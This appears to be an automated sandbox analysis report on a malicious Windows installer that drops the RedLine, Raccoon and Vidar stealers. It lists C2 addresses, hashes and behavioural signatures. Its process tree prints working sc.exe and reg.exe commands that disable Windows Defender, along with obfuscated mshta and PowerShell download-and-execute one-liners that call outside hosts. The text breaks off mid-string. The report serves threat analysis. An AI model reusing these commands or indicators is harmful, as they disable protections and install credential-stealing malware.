Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
Setup.exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
762s -
max time network
796s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
01-09-2021 13:18
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210408
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210408
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210408
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210408
General
-
Target
Setup (1).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://ia601409.us.archive.org/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435.txt
Extracted
https://kmsauto.us/1/fix.txt
Extracted
redline
bratanchikAYE
45.14.49.232:63850
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
spnewportspectr
135.148.139.222:1594
Extracted
raccoon
d02c5d65069fc7ce1993e7c52edf0c9c4c195c81
-
url4cnc
https://telete.in/open3entershift
Extracted
redline
NORMAN2
45.14.49.184:27587
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9044 6404 rundll32.exe 245 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 31 IoCs
resource yara_rule behavioral1/files/0x000100000001ab5c-190.dat family_redline behavioral1/memory/3456-235-0x0000000005270000-0x0000000005876000-memory.dmp family_redline behavioral1/memory/4816-263-0x0000000000400000-0x000000000044A000-memory.dmp family_redline behavioral1/memory/4840-268-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/4816-266-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/4840-265-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/5024-307-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/4536-338-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/4536-370-0x0000000005090000-0x0000000005696000-memory.dmp family_redline behavioral1/memory/4768-410-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/2384-420-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/1448-447-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/4632-409-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/5252-488-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/4932-378-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/5088-376-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/4668-358-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/4212-339-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/5008-306-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/4968-303-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/4832-267-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/4832-264-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/5292-495-0x000000000041C5CA-mapping.dmp family_redline behavioral1/files/0x000100000001ab5c-171.dat family_redline behavioral1/memory/5468-513-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/5708-528-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/5860-536-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/5952-548-0x000000000041C5EE-mapping.dmp family_redline behavioral1/memory/6060-559-0x000000000041C5CA-mapping.dmp family_redline behavioral1/memory/5168-571-0x000000000041C5BE-mapping.dmp family_redline behavioral1/memory/4364-583-0x000000000041C5EE-mapping.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/3424-253-0x00000000008B0000-0x0000000000983000-memory.dmp family_vidar behavioral1/memory/3424-254-0x0000000000400000-0x0000000000593000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
pid Process 1808 LM2I2uM4PPppb9fXMHQIkSy1.exe 3664 YzrXlWxGcfDrjSJ9FX7AEpid.exe 2284 5pkW9vwRA5kdv26inNNIRYvj.exe 2184 0JXNrs2hv3cXBOmqj0EdPlmm.exe 2204 yPPvcHeJx5BXut4bjVmApamW.exe 2956 eK94rhp2j4votGuwVG47MZmB.exe 4088 7eoxxSSxUvFsSiF_hfeSfvb8.exe 3904 rjhIupatZBhIU5AiYzbG8InV.exe 4084 lVTo_9MOui5CoPDC4lagnV1O.exe 1388 V80Q31fPNGdLW2viJmAxNKUu.exe 3076 VI9yjDwRKJv3Cx451ew9vD6b.exe 3272 5hPoKwa5jgLXjimLYbtW5WTg.exe 744 7XKeu_QmhY7kfMdQz4d91p2P.exe 3756 oyPn9ag3coYhFZms71V5xBnt.exe 3912 2AV3_0GUa0CExcaxg1wRO2NO.exe 3424 dbb5DUcoPeU6SiCXVWFolbhZ.exe 3760 UoG69yBdbeyoAcA7BlhpKPCk.exe 3464 KSXtGBuDkma5IPEreQEYGo6P.exe 1824 hJSd8eo5QbCqayV9NzEiFE9x.exe 2268 A9JW3dOLk22vVdJN78y31mHl.exe 3160 H77ct3jCq9NSUt6ER6o9C0xz.exe 3456 GUzxt52CKE4BsEjzReXXeacK.exe 2552 L4Z7jdrpIxaqXdbnMIGAoKm8.exe 416 e9knWVxHPm_Gfdz1L_KOLKiC.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2AV3_0GUa0CExcaxg1wRO2NO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2AV3_0GUa0CExcaxg1wRO2NO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LM2I2uM4PPppb9fXMHQIkSy1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LM2I2uM4PPppb9fXMHQIkSy1.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Setup (1).exe -
resource yara_rule behavioral1/memory/3912-208-0x0000000000930000-0x0000000000931000-memory.dmp themida behavioral1/memory/1808-211-0x0000000001380000-0x0000000001381000-memory.dmp themida behavioral1/files/0x000100000001ab5a-181.dat themida behavioral1/files/0x000100000001ab69-180.dat themida behavioral1/files/0x000100000001ab69-160.dat themida behavioral1/files/0x000100000001ab5a-139.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2AV3_0GUa0CExcaxg1wRO2NO.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LM2I2uM4PPppb9fXMHQIkSy1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ipinfo.io 154 ipinfo.io 592 freegeoip.app 596 freegeoip.app 648 freegeoip.app 30 ipinfo.io 115 ip-api.com 123 ipinfo.io 145 ipinfo.io 605 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3912 2AV3_0GUa0CExcaxg1wRO2NO.exe 1808 LM2I2uM4PPppb9fXMHQIkSy1.exe -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe VI9yjDwRKJv3Cx451ew9vD6b.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe VI9yjDwRKJv3Cx451ew9vD6b.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini VI9yjDwRKJv3Cx451ew9vD6b.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe VI9yjDwRKJv3Cx451ew9vD6b.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe VI9yjDwRKJv3Cx451ew9vD6b.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 62 IoCs
pid pid_target Process procid_target 5996 744 WerFault.exe 88 5988 4084 WerFault.exe 92 5980 3464 WerFault.exe 80 5972 3760 WerFault.exe 84 2920 4084 WerFault.exe 92 5428 4084 WerFault.exe 92 5892 3464 WerFault.exe 80 5944 3760 WerFault.exe 84 4612 744 WerFault.exe 88 4760 4084 WerFault.exe 92 5692 3160 WerFault.exe 82 4760 744 WerFault.exe 88 5272 3464 WerFault.exe 80 6280 3760 WerFault.exe 84 6488 3464 WerFault.exe 80 6560 3160 WerFault.exe 82 6760 4184 WerFault.exe 177 7088 3760 WerFault.exe 84 4484 3760 WerFault.exe 84 3664 4084 WerFault.exe 92 6860 4084 WerFault.exe 92 6012 744 WerFault.exe 88 4560 6964 WerFault.exe 227 6756 3464 WerFault.exe 80 6776 744 WerFault.exe 88 7028 4640 WerFault.exe 233 3696 4084 WerFault.exe 92 6772 3464 WerFault.exe 80 2540 3464 WerFault.exe 80 7240 3464 WerFault.exe 80 7652 3464 WerFault.exe 80 8000 3464 WerFault.exe 80 7648 3464 WerFault.exe 80 412 3760 WerFault.exe 84 5640 3760 WerFault.exe 84 8924 3760 WerFault.exe 84 9816 3760 WerFault.exe 84 9320 3760 WerFault.exe 84 9968 5192 WerFault.exe 342 10184 5192 WerFault.exe 342 10496 4084 WerFault.exe 92 10472 5192 WerFault.exe 342 10612 5192 WerFault.exe 342 7080 4084 WerFault.exe 92 8164 5192 WerFault.exe 342 11820 5192 WerFault.exe 342 7648 5192 WerFault.exe 342 11848 5192 WerFault.exe 342 11536 5192 WerFault.exe 342 11960 5192 WerFault.exe 342 8032 11648 WerFault.exe 450 5072 5192 WerFault.exe 342 12096 5192 WerFault.exe 342 12416 5192 WerFault.exe 342 12812 5192 WerFault.exe 342 3292 12808 WerFault.exe 489 13400 14068 WerFault.exe 512 14212 12292 WerFault.exe 548 15552 4084 WerFault.exe 92 16880 16460 WerFault.exe 600 11596 16692 WerFault.exe 17924 10048 WerFault.exe 652 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4704 schtasks.exe 4656 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 12556 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 11620 taskkill.exe 11692 taskkill.exe 9928 taskkill.exe 4204 taskkill.exe 5096 taskkill.exe 9800 taskkill.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 152 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 163 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 644 Setup (1).exe 644 Setup (1).exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1388 rjhIupatZBhIU5AiYzbG8InV.exe Token: SeDebugPrivilege 3664 0JXNrs2hv3cXBOmqj0EdPlmm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 644 wrote to memory of 3760 644 Setup (1).exe 84 PID 644 wrote to memory of 3760 644 Setup (1).exe 84 PID 644 wrote to memory of 3760 644 Setup (1).exe 84 PID 644 wrote to memory of 2284 644 Setup (1).exe 98 PID 644 wrote to memory of 2284 644 Setup (1).exe 98 PID 644 wrote to memory of 2284 644 Setup (1).exe 98 PID 644 wrote to memory of 1808 644 Setup (1).exe 100 PID 644 wrote to memory of 1808 644 Setup (1).exe 100 PID 644 wrote to memory of 1808 644 Setup (1).exe 100 PID 644 wrote to memory of 3664 644 Setup (1).exe 101 PID 644 wrote to memory of 3664 644 Setup (1).exe 101 PID 644 wrote to memory of 2204 644 Setup (1).exe 97 PID 644 wrote to memory of 2204 644 Setup (1).exe 97 PID 644 wrote to memory of 2204 644 Setup (1).exe 97 PID 644 wrote to memory of 2184 644 Setup (1).exe 95 PID 644 wrote to memory of 2184 644 Setup (1).exe 95 PID 644 wrote to memory of 2184 644 Setup (1).exe 95 PID 644 wrote to memory of 2956 644 Setup (1).exe 96 PID 644 wrote to memory of 2956 644 Setup (1).exe 96 PID 644 wrote to memory of 2956 644 Setup (1).exe 96 PID 644 wrote to memory of 4088 644 Setup (1).exe 94 PID 644 wrote to memory of 4088 644 Setup (1).exe 94 PID 644 wrote to memory of 4088 644 Setup (1).exe 94 PID 644 wrote to memory of 3464 644 Setup (1).exe 80 PID 644 wrote to memory of 3464 644 Setup (1).exe 80 PID 644 wrote to memory of 3464 644 Setup (1).exe 80 PID 644 wrote to memory of 3904 644 Setup (1).exe 93 PID 644 wrote to memory of 3904 644 Setup (1).exe 93 PID 644 wrote to memory of 3904 644 Setup (1).exe 93 PID 644 wrote to memory of 2268 644 Setup (1).exe 79 PID 644 wrote to memory of 2268 644 Setup (1).exe 79 PID 644 wrote to memory of 2268 644 Setup (1).exe 79 PID 644 wrote to memory of 1824 644 Setup (1).exe 81 PID 644 wrote to memory of 1824 644 Setup (1).exe 81 PID 644 wrote to memory of 1824 644 Setup (1).exe 81 PID 644 wrote to memory of 4084 644 Setup (1).exe 92 PID 644 wrote to memory of 4084 644 Setup (1).exe 92 PID 644 wrote to memory of 4084 644 Setup (1).exe 92 PID 644 wrote to memory of 1388 644 Setup (1).exe 91 PID 644 wrote to memory of 1388 644 Setup (1).exe 91 PID 644 wrote to memory of 3076 644 Setup (1).exe 90 PID 644 wrote to memory of 3076 644 Setup (1).exe 90 PID 644 wrote to memory of 3076 644 Setup (1).exe 90 PID 644 wrote to memory of 3160 644 Setup (1).exe 82 PID 644 wrote to memory of 3160 644 Setup (1).exe 82 PID 644 wrote to memory of 3160 644 Setup (1).exe 82 PID 644 wrote to memory of 3456 644 Setup (1).exe 83 PID 644 wrote to memory of 3456 644 Setup (1).exe 83 PID 644 wrote to memory of 3456 644 Setup (1).exe 83 PID 644 wrote to memory of 2552 644 Setup (1).exe 78 PID 644 wrote to memory of 2552 644 Setup (1).exe 78 PID 644 wrote to memory of 3272 644 Setup (1).exe 89 PID 644 wrote to memory of 3272 644 Setup (1).exe 89 PID 644 wrote to memory of 3272 644 Setup (1).exe 89 PID 644 wrote to memory of 744 644 Setup (1).exe 88 PID 644 wrote to memory of 744 644 Setup (1).exe 88 PID 644 wrote to memory of 744 644 Setup (1).exe 88 PID 644 wrote to memory of 3424 644 Setup (1).exe 87 PID 644 wrote to memory of 3424 644 Setup (1).exe 87 PID 644 wrote to memory of 3424 644 Setup (1).exe 87 PID 644 wrote to memory of 3912 644 Setup (1).exe 86 PID 644 wrote to memory of 3912 644 Setup (1).exe 86 PID 644 wrote to memory of 3912 644 Setup (1).exe 86 PID 644 wrote to memory of 3756 644 Setup (1).exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\Documents\L4Z7jdrpIxaqXdbnMIGAoKm8.exe"C:\Users\Admin\Documents\L4Z7jdrpIxaqXdbnMIGAoKm8.exe"2⤵
- Executes dropped EXE
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\Ou4HyCXV.com"C:\Users\Admin\AppData\Local\Temp\Ou4HyCXV.com"3⤵PID:4544
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5A70.tmp\5A71.tmp\5A72.bat C:\Users\Admin\AppData\Local\Temp\Ou4HyCXV.com"4⤵PID:5484
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵PID:5612
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵PID:4444
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵PID:5772
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵PID:1872
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵PID:4764
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:6644
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:1628
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:6692
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:4272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵PID:6516
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵PID:5044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵PID:1248
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:3048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6372
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:7224
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:7524
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:7828
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:8132
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵PID:7560
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵PID:6020
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:7712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵PID:4776
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵PID:8032
-
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵PID:7712
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f5⤵PID:7244
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f5⤵PID:1872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵PID:8464
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵PID:8792
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵PID:9188
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:424
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:9072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MOw4YAa4.com"C:\Users\Admin\AppData\Local\Temp\MOw4YAa4.com"3⤵PID:6416
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://ia601408.us.archive.org/23/items/fix.hta-ert/FIX.hta_ert.txt4⤵PID:5532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601409XXXusXXXarchiveXXXorg/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435XXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))5⤵PID:11864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fx1aEnE0.com"C:\Users\Admin\AppData\Local\Temp\fx1aEnE0.com"3⤵PID:6848
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/1/FIX.hta4⤵PID:7436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://kmsautoXXXus/1/fixXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=